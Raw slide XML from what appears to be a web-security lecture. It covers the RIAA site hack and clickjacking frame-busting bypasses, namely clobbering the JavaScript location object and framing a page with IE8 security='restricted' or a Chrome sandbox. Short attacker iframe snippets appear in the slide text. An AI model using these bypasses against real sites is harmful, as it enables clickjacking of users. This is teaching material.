              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
              </a:rPr>
              <a:t>on the RIAA's site came to light via social network  news site … hackers turned the site into a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
              </a:rPr>
              <a:t>blank </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
              </a:rPr>
              <a:t>slate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
              </a:rPr>
              <a:t>among other</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
              </a:rPr>
              <a:t>things.”</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Tempus Sans ITC"/>
              <a:cs typeface="Tempus Sans ITC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>
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="561340">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
              </a:rPr>
              <a:t>“The </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
              </a:rPr>
              <a:t>RIAA </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
              </a:rPr>
              <a:t>has </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
              </a:rPr>
              <a:t>restored RIAA.org, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
              </a:rPr>
              <a:t>although whether </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
              </a:rPr>
              <a:t>it's any </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
              </a:rPr>
              <a:t>more </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
              </a:rPr>
              <a:t>secure than before  remains open to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
              </a:rPr>
              <a:t>question”</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Tempus Sans ITC"/>
              <a:cs typeface="Tempus Sans ITC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650">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="698500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
              </a:rPr>
              <a:t>Source:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.theregister.co.uk/2008/01/21/riaa_hacktivism/</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Tempus Sans ITC"/>
              <a:cs typeface="Tempus Sans ITC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094216" y="6805633"/>
            <a:ext cx="135890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sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:fld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14069" y="781304"/>
            <a:ext cx="825880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35" dirty="0"/>
              <a:t>Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" dirty="0"/>
              <a:t>type – </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-5" dirty="0"/>
              <a:t>Clobbering of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-20" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-5" dirty="0"/>
              <a:t>object</a:t>
            </a:r>
            <a:endParaRPr sz="360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70</a:t>
            </a:fld>
            <a:endParaRPr dirty="0"/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593850" y="2355850"/>
          <a:ext cx="6934835" cy="22377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74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605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816610">
                        <a:lnSpc>
                          <a:spcPts val="2060"/>
                        </a:lnSpc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Location</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Constantia"/>
                        <a:cs typeface="Constantia"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0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53975">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid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2060"/>
                        </a:lnSpc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Code</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Constantia"/>
                        <a:cs typeface="Constantia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53975">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="0F6F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81710">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="75565" marR="65405">
                        <a:lnSpc>
                          <a:spcPct val="100299"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="509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Legitimate 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web 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page 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(h</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" b="1" spc="-30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t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tp://</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" b="1" spc="30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ww</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" b="1" spc="-175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w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.fa</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" b="1" spc="-40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c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ebook. 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com)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Constantia"/>
                        <a:cs typeface="Constantia"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="64769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3975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244475" marR="1214755" indent="-169545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sz="1800" spc="-10" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>if(top.location </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>!=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-70" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-5" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>self.location){  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-10" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>top.location </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-75" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-5" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>self.location;</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Constantia"/>
                        <a:cs typeface="Constantia"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="7493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800" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Constantia"/>
                        <a:cs typeface="Constantia"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="654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53975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17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75565">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pP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Attacker </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" b="1" spc="-20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web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" b="1" spc="-180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 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onstantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>page</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Constantia"/>
                        <a:cs typeface="Constantia"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="4445" marB="0">
                    <a:lnL w="1905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74930">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="509"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>&lt;script&gt; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-10" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>var </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-5" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>location </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>= </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-5" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>"foo";</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-165" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>&lt;/script&gt;</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Constantia"/>
                        <a:cs typeface="Constantia"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="74930">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1800" spc="-5" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>&lt;iframe</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-100" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-10" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>src</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-10" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>="http://w</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-10" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>ww</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-10" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>.facebook.com"&gt;</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Constantia"/>
                        <a:cs typeface="Constantia"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="7493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800" spc="-5" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>&lt;/iframe&gt;</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Constantia"/>
                        <a:cs typeface="Constantia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CC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070863" y="560323"/>
            <a:ext cx="8068309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500" spc="-45" dirty="0"/>
              <a:t>Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4500" spc="-5" dirty="0"/>
              <a:t>type </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4500" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4500" spc="-15" dirty="0"/>
              <a:t>Restricting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4500" spc="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4500" spc="-25" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:endParaRPr sz="4500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1185163" y="1689608"/>
            <a:ext cx="7609840" cy="1196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9079" marR="5080" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="259715" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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can</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-4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be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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disabled</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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context</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-11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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="1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the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iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-8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in  the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>latest </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-24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versions</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="259079" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="259715" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>frame </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>busting </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>code </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>will not</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-36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run.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47800" y="3346703"/>
            <a:ext cx="0" cy="2463800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="2463800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="246354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839200" y="3346703"/>
            <a:ext cx="0" cy="2463800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="2463800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="2463546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41703" y="3346450"/>
            <a:ext cx="7404734" cy="12700"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7404734" h="12700">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="12700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7404354" y="12700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740435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41703" y="5791200"/>
            <a:ext cx="7404734" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7404734">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7404354" y="0"/>
                </a:lnTo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454150" y="3359150"/>
            <a:ext cx="7378700" cy="2413000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0F6FC6"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="444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endParaRPr sz="1900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="7620">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(IE</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" dirty="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onstantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>8):</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="7620">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>sr</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>c="ht</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-15" dirty="0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sz="2000" b="1" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>p://w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ww</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>.xyz.com"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-114" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>security="restricted"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="7620">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;/iframe&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="20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50">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="7620">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(Chrome):</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="7620">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>sr</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>c="ht</a:t>
            </a:r>
            <a:r>
